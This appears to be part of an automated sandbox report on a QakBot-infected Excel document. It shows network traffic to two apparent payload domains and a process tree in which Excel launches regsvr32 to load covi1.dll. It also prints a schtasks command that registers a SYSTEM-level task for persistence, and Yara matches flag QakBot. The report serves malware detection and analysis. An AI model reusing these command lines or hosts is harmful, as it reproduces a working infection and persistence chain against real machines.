                                                                                                                                                              Jun 11, 2021 11:02:10.357153893 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.357340097 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.369098902 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.542629957 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.542787075 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.544142962 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.738284111 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738316059 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738333941 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738349915 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738373041 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738390923 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738411903 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738430977 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738441944 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.738447905 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738468885 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.738491058 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.738535881 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.913872004 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.913904905 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.913925886 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.913948059 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.913969040 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.913990974 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914014101 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914036989 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914057016 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914077997 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914078951 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.914098978 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914122105 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914141893 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914161921 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914226055 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914233923 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.914292097 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914318085 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.914380074 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.914381981 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914402962 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914458036 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.914469004 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914493084 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.914521933 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.914577961 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087445021 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087512970 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087539911 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087551117 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087579966 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087604046 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087605953 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087647915 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087678909 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087687969 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087692976 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087728024 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087745905 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087766886 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087774038 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087805986 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087824106 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087846994 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087855101 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087887049 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087929010 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087944984 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.087948084 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.087991953 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.088018894 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.088031054 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.088047028 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.088079929 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.088088036 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.088124037 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.088134050 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.088164091 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.088182926 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.088205099 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.088223934 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.088244915 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.088257074 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.088284016 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.088314056 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:11.088326931 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.088340044 CEST49720443192.168.2.343.225.55.182

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jun 11, 2021 11:01:51.646730900 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:01:51.701337099 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:01:53.411303043 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:01:53.461457014 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:01:54.537827969 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:01:54.591109991 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:01:56.994041920 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:01:57.047053099 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:00.392600060 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:00.454271078 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:02.642544985 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:02.692666054 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:03.567414045 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:03.650815964 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:04.116929054 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:04.175929070 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:05.164887905 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:05.215507030 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:06.024506092 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:06.075067043 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:06.209568024 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:06.270195961 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:06.967197895 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:07.017791033 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:08.211253881 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:08.261795044 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:08.299072027 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:08.349015951 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:09.937530041 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:10.004744053 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.016731977 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:10.067039967 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.155056000 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:11.205396891 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:11.481847048 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:11.669271946 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:12.186191082 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:12.236732006 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:12.272711039 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:12.323201895 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:15.409883022 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:15.462820053 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:16.298429966 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:16.352140903 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:17.549199104 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:17.599546909 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:18.756428003 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:18.807145119 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:19.675369024 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:19.725904942 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:24.739000082 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:24.816112041 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:27.969533920 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:28.019932032 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:30.040194988 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:30.090717077 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:46.400965929 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:46.461443901 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:54.546292067 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:02:54.618474007 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:03:09.308240891 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:03:09.369434118 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:03:13.965982914 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:03:14.027370930 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:03:45.065171957 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:03:45.139734983 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:03:46.520637035 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:03:46.584225893 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:04:06.286187887 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:04:06.346257925 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:04:06.890294075 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                              Jun 11, 2021 11:04:06.940583944 CEST53563388.8.8.8192.168.2.3

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                              Jun 11, 2021 11:02:09.937530041 CEST192.168.2.38.8.8.80x4093Standard query (0)shadiinfo.comA (IP address)IN (0x0001)
                                                                                                                                                              Jun 11, 2021 11:02:11.481847048 CEST192.168.2.38.8.8.80xbc93Standard query (0)treasurechestcaribbean.comA (IP address)IN (0x0001)

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                              Jun 11, 2021 11:02:10.004744053 CEST8.8.8.8192.168.2.30x4093No error (0)shadiinfo.com43.225.55.182A (IP address)IN (0x0001)
                                                                                                                                                              Jun 11, 2021 11:02:11.669271946 CEST8.8.8.8192.168.2.30xbc93No error (0)treasurechestcaribbean.com192.185.33.154A (IP address)IN (0x0001)
                                                                                                                                                              Jun 11, 2021 11:04:06.346257925 CEST8.8.8.8192.168.2.30xa285No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                              HTTPS Packets

                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                              Jun 11, 2021 11:02:10.357153893 CEST43.225.55.182443192.168.2.349720CN=shadiinfo.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri May 14 13:03:47 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Thu Aug 12 13:03:47 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                              CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                              CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                                                                                                                                                              Jun 11, 2021 11:02:11.996078014 CEST192.185.33.154443192.168.2.349723CN=*.treasurechestcaribbean.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat May 15 10:36:32 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Fri Aug 13 10:36:32 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                              CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                              CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:01
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                              Imagebase:0x850000
                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:03
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\splwow64.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                              Imagebase:0x7ff71efd0000
                                                                                                                                                              File size:130560 bytes
                                                                                                                                                              MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:12
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:regsvr32 -s ..\covi1.dll
                                                                                                                                                              Imagebase:0x1320000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:16
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              Imagebase:0x1180000
                                                                                                                                                              File size:3611360 bytes
                                                                                                                                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: QakBot, Description: QakBot Payload, Source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:17
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:regsvr32 -s ..\covi2.dll
                                                                                                                                                              Imagebase:0x1320000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:17
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hoqmcni /tr 'regsvr32.exe -s \'C:\Users\user\covi1.dll\'' /SC ONCE /Z /ST 11:04 /ET 11:16
                                                                                                                                                              Imagebase:0xe60000
                                                                                                                                                              File size:185856 bytes
                                                                                                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:17
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                                                                              File size:625664 bytes
                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:19
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:regsvr32.exe -s 'C:\Users\user\covi1.dll'
                                                                                                                                                              Imagebase:0x7ff755e40000
                                                                                                                                                              File size:24064 bytes
                                                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:21
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline: -s 'C:\Users\user\covi1.dll'
                                                                                                                                                              Imagebase:0xea0000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:02:24
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 652
                                                                                                                                                              Imagebase:0x330000
                                                                                                                                                              File size:434592 bytes
                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:04:00
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:regsvr32.exe -s 'C:\Users\user\covi1.dll'
                                                                                                                                                              Imagebase:0x7ff62a3b0000
                                                                                                                                                              File size:24064 bytes
                                                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:04:00
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline: -s 'C:\Users\user\covi1.dll'
                                                                                                                                                              Imagebase:0x10b0000
                                                                                                                                                              File size:20992 bytes
                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:11:04:02
                                                                                                                                                              Start date:11/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 652
                                                                                                                                                              Imagebase:0x1070000
                                                                                                                                                              File size:434592 bytes
                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Disassembly

                                                                                                                                                              Code Analysis

                                                                                                                                                              Reset < >